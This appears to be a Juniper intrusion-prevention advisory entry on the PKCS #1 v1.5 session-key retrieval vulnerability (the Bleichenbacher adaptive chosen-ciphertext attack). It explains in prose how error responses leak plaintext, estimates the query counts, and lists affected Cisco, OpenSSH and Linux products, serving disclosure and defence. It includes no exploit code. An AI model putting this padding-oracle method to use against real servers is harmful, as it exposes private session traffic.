• Product Information
• Security Products Overview
• Juniper Networks ISG Series
• IDP Demo
• Product Poster & Z-Card 

Title: PKCS #1 Version 1.5 Session Key Retrieval Vulnerability

Severity: HIGH

Description:

The data encryption techniques described in RSA's PKCS #1 standard are used in many protocols which rely on, at least in part, the security provided by public-key cryptography systems.

Several protocols which implement the digital enveloping method described in version 1.5 of the PKCS #1 standard are susceptible to an adaptive ciphertext attack which may allow the recovery of session keys, thus compromising the integrity of the data transmitting during that session.

By capturing and logging the packets transmitted between a client and a server, an opponent could make use of a captured encrypted session key to launch a Bleichenbacher attack together with a simple timing attack. If the session key is successfully decrypted, the saved packets can easily be decrypted in a uniform manner.

It is possible to launch an attack against recipient systems where public key sets are maintained for more than a single session. By observing the responses and behavior of the recipient after a PKCS #1 decryption operation, the opponent can determine some information about the decryption of an arbitrary ciphertext. Because an opponent knows that the decryption of a PKCS #1 ciphertext will start with the bytes 00 02, performing this attack is feasible.

Using the PKCS #1 encoding method, an entire byte (and possibly more) of a ciphertext can be determined when the recipient does not output an error message indicating the decryption has the wrong form. Through the use of this method, all bits of a decryption can be computed from the bits revealed by successful decryptions of adapatively chosen ciphertexts.

Once a set of "good" ciphertexts is established, that is, ones for which the recipient did not respond with an error message, the opponent must infer certain bits of the corresponding message, and from those bits reduce the size of the interval that must contain the unknown message. If enough good ciphertexts are found, the opponent is able to determine the contents of the message.

To carry out an attack for a 1024-bit modulus, approximately 2^20 attempts are required, this is also the number of queries to the recipient. For a protocol which uses a seperate host and client session key, such as SSH-1, an additional 2^19 or 2^20 attempts are required.

The impact of the attack depends on the protocol of interest. Interactive key establishment protocols such as SSH-1 or SSL are generally significantly more susceptible to successful attacks, because a target server will allow many messages to be processed, and may reveal the success or failure of an operation. However, such protocols often limit the lifetime of public keys; attacks must therefore be performed within a certain time frame. In the case of SSH-1, this is by default one hour.

This problem makes it possible for an opponent to compromise potentially sensitive traffic between a client and server if the session key can be sucessfully decrypted.

All versions of WebNS for Cisco CSS 11000 prior to, but excluding versions 4.01 B42s, 4.10 B22s, 5.0 B11s, and 5.01 B6s are vulnerable to this issue.

Affected Products:

• Blue Coat Systems Security Gateway OS 2.1.5001 SP1
• Cisco CSS11000 Content Services Switch
• Cisco CSS11050 Content Services Switch
• Cisco CSS11150 Content Services Switch
• Cisco CSS11501 Content Services Switch
• Cisco CSS11503 Content Services Switch
• Cisco CSS11506 Content Services Switch
• Cisco CSS11800 Content Services Switch
• Cisco Catalyst 6000 6.2.0(0.110)
• Cisco IOS 12.0S
• Cisco IOS 12.1DB
• Cisco IOS 12.1DC
• Cisco IOS 12.1E
• Cisco IOS 12.1EC
• Cisco IOS 12.1EX
• Cisco IOS 12.1EY
• Cisco IOS 12.1EZ
• Cisco IOS 12.1T
• Cisco IOS 12.1XA
• Cisco IOS 12.1XB
• Cisco IOS 12.1XC
• Cisco IOS 12.1XD
• Cisco IOS 12.1XE
• Cisco IOS 12.1XF
• Cisco IOS 12.1XG
• Cisco IOS 12.1XH
• Cisco IOS 12.1XI
• Cisco IOS 12.1XJ
• Cisco IOS 12.1XK
• Cisco IOS 12.1XL
• Cisco IOS 12.1XM
• Cisco IOS 12.1XP
• Cisco IOS 12.1XQ
• Cisco IOS 12.1XR
• Cisco IOS 12.1XS
• Cisco IOS 12.1XT
• Cisco IOS 12.1XU
• Cisco IOS 12.1XV
• Cisco IOS 12.1XY
• Cisco IOS 12.1YA
• Cisco IOS 12.1YB
• Cisco IOS 12.1YC
• Cisco IOS 12.1YD
• Cisco IOS 12.1YF
• Cisco IOS 12.2
• Cisco IOS 12.2T
• Cisco IOS 12.2XA
• Cisco IOS 12.2XD
• Cisco IOS 12.2XE
• Cisco IOS 12.2XH
• Cisco IOS 12.2XQ
• Cisco PIX Firewall 5.2.0(5)
• Cisco PIX Firewall 5.3.0(1)
• Cisco WebNS 3.0.0
• Cisco WebNS 3.1.0
• Cisco WebNS 4.0.0
• Cisco WebNS 4.0.01B23s
• Cisco WebNS 4.0.01B29s
• Cisco WebNS 4.0.1
• Cisco WebNS 4.0.1B19s
• Cisco WebNS 4.1.00B13s
• Cisco WebNS 4.1.00B17s
• Conectiva Linux 5.1.0
• OpenSSH OpenSSH 1.2.3
• OpenSSH OpenSSH 2.1.0
• OpenSSH OpenSSH 2.1.1
• S.u.S.E. Linux 7.0.0 alpha
• S.u.S.E. Linux 7.0.0 i386
• S.u.S.E. Linux 7.0.0 ppc
• S.u.S.E. Linux 7.0.0 sparc
• SSH Communications Security SSH 1.2.31

References:

• Cisco Systems: Cisco Security Advisory: Multiple SSH Vulnerabilities

Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.